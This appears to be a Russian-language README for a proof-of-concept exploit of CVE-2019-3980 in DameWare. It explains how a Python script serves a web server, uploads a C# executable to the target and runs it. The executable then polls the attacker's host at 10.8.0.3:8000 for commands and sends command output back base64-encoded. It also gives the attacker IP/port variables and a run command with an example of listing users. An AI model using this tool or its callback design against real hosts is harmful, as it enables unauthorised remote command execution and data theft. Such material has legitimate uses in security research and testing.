
Proof-of-concept эксплойт для CVE-2019-3980, обеспечивающий удаленное выполнение команд с помощью пользовательской полезной нагрузки на C# с HTTP-обратным вызовом для извлечения вывода.
Этот репозиторий создан для использования POC из Nessus с помощью пользовательского исполняемого файла на C#, чтобы выполнять команды на удаленном хосте и получать вывод команды.
Python-файл используется для запуска веб-сервера, выполнения эксплойта и последующего получения результатов через веб-сервер.
Исполняемый файл C# загружается через эксплойт на цель.
При выполнении на цели exe обращается к указанному IP/порту, чтобы получить команду для выполнения (путь — /cmd).
После завершения команды exe отправляет вывод на тот же веб-сервер.
Отправка вывода выполняется через GET-запрос, который вызовет 404, но это нормально — мы просто хотим получить данные в base64.
В исполняемом файле C# есть две переменные, которые необходимо обновить.
Эти переменные ссылаются на IP и порт атакующей системы:
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
Пример ниже выполняет команду net users на удаленном хосте.
